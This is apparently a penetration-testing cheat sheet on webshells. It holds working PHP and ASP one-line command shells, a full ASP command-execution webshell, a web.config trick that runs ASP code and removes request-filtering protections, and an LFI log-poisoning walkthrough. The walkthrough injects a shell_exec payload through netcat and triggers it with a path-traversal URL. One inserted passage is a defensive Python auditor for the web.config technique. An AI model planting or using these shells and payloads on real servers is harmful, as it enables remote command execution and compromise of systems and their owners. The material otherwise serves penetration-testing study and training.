Webshell

PHP 15 bytes shell

<?=`$_GET[0]`?>

Asp/Aspx

One Line ASP Shell
<%response.write CreateObject("WScript.Shell").Exec(Request.QueryString("cmd")).StdOut.Readall()%>
Request with: http://target/shell.asp?cmd=ipconfig
SharPyShell: tiny and obfuscated ASP.NET webshell for C# web applications.
python SharPyShell.py generate -p somepassword
python SharPyShell.py interact -u http://target.url/sharpyshell.aspx -p somepassword

Running web.config as an ASP file

Sometimes IIS supports ASP files, but it is not possible to upload any file with the .ASP extension. In this case, a web.config file can be used directly to run classic ASP code:
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
  <system.webServer>
    <handlers accessPolicy="Read, Script, Write">
      <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
    </handlers>
    <security>
      <requestFiltering>
        <fileExtensions>
          <remove fileExtension=".config" />
        </fileExtensions>
        <hiddenSegments>
          <remove segment="web.config" />
        </hiddenSegments>
      </requestFiltering>
    </security>
  </system.webServer>
</configuration>
<!-- ASP code comes here! It should not include HTML comment closing tag and double dashes!
<%
Response.write("-"&"->")
' it is running the ASP code if you can see 3 by opening the web.config file!
Response.write(1+2)
Response.write("<!-"&"-")
%>
-->
Examples of ASP webshells: webshell/fuzzdb-webshell/asp at master · tennc/webshell (GitHub)
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
  <system.webServer>
    <handlers accessPolicy="Read, Script, Write">
      <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
    </handlers>
    <security>
      <requestFiltering>
        <fileExtensions>
          <remove fileExtension=".config" />
        </fileExtensions>
        <hiddenSegments>
          <remove segment="web.config" />
        </hiddenSegments>
      </requestFiltering>
    </security>
  </system.webServer>
</configuration>

<%
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
Function getCommandOutput(theCommand)
Dim objShell, objCmdExec
Set objShell = CreateObject("WScript.Shell")
Set objCmdExec = objshell.exec(thecommand)
getCommandOutput = objCmdExec.StdOut.ReadAll
end Function
%>

<FORM action="" method="GET">
<input type="text" name="cmd" size=45 value="<%= szCMD %>">
<input type="submit" value="Run">
</FORM>
<PRE>
<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
<%Response.Write(Request.ServerVariables("server_name"))%>
<p>
<b>The server's port:</b>
<%Response.Write(Request.ServerVariables("server_port"))%>
</p>
<p>
<b>The server's software:</b>
<%Response.Write(Request.ServerVariables("server_software"))%>
</p>
<p>
<b>The server's software:</b>
<%Response.Write(Request.ServerVariables("LOCAL_ADDR"))%>
<% szCMD = request("cmd")
thisDir = getCommandOutput("cmd /c" & szCMD)
Response.Write(thisDir)%>
</p>
<br>
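A defensive check for the web.config technique described above, as an added example that is not from the original page or the linked projects: it audits a web.config for the handler mapping and requestFiltering removals shown, and for ASP delimiters in the raw text. The finding names, the `SCRIPT_ENGINES` list and the sample file are constructed for illustration.

```python
import xml.etree.ElementTree as ET

# Constructed sample: the settings shown above plus a harmless classic-ASP marker.
SAMPLE = r'''<?xml version="1.0" encoding="UTF-8"?>
<configuration>
  <system.webServer>
    <handlers accessPolicy="Read, Script, Write">
      <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" />
    </handlers>
    <security><requestFiltering>
      <fileExtensions><remove fileExtension=".config" /></fileExtensions>
      <hiddenSegments><remove segment="web.config" /></hiddenSegments>
    </requestFiltering></security>
  </system.webServer>
</configuration>
<!-- <% Response.write(1+2) %> -->'''

SCRIPT_ENGINES = ("asp.dll", "aspnet_isapi.dll")  # assumption: extend per environment


def audit_web_config(text):
    """Return a sorted list of finding IDs for the contents of one web.config."""
    findings = set()
    # ASP delimiters are not expected in a config file. Check the raw text, because
    # code placed after </configuration> can make the file unparseable as XML.
    if "<%" in text:
        findings.add("asp-delimiters")
    end = text.find("</configuration>")
    xml_part = text[: end + len("</configuration>")] if end != -1 else text
    try:
        root = ET.fromstring(xml_part.encode("utf-8"))
    except ET.ParseError:
        findings.add("unparseable-xml")
        return sorted(findings)
    for add in root.iter("add"):
        path = (add.get("path") or "").lower()
        proc = (add.get("scriptProcessor") or "").lower()
        if path.endswith(".config") and proc.endswith(SCRIPT_ENGINES):
            findings.add("config-mapped-to-script-engine")
    for rem in root.iter("remove"):
        if (rem.get("fileExtension") or "").lower() == ".config":
            findings.add("config-extension-unblocked")
        if (rem.get("segment") or "").lower() == "web.config":
            findings.add("web.config-segment-unhidden")
    return sorted(findings)


if __name__ == "__main__":
    print(audit_web_config(SAMPLE))
```

Running it over every web.config below the site root, including upload directories, surfaces files that combine these settings.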

Log poisoning + LFI + shell

Required: Initial LFI found
Intercept the request and inject the PHP cmd snippet into the User-Agent header, replacing the highlighted data.
We can also try to add via netcat:
nc -nv 10.11.1.35 80
(UNKNOWN) [10.11.1.35] 80 (http) open
<?php echo shell_exec($_GET['cmd']);?>

HTTP/1.1 400 Bad Request
Next, get RCE by adding the cmd parameter:
http://10.11.15.137/addguestbook.php?name=aaa&comment=aaa&cmd=dir%20&LANG=../../../../../../../xampp/apache/logs/access.log%00
Get Reverse Shell Through Log Poisoning with the Vulnerability of — LFI ( LOCAL FILE INCLUSION ) (Medium)
RCE via LFI Log Poisoning - The Death Potion (Medium)
GitHub - nil0x42/phpsploit: Full-featured C2 framework which silently persists on webserver with a single-line PHP backdoor (GitHub)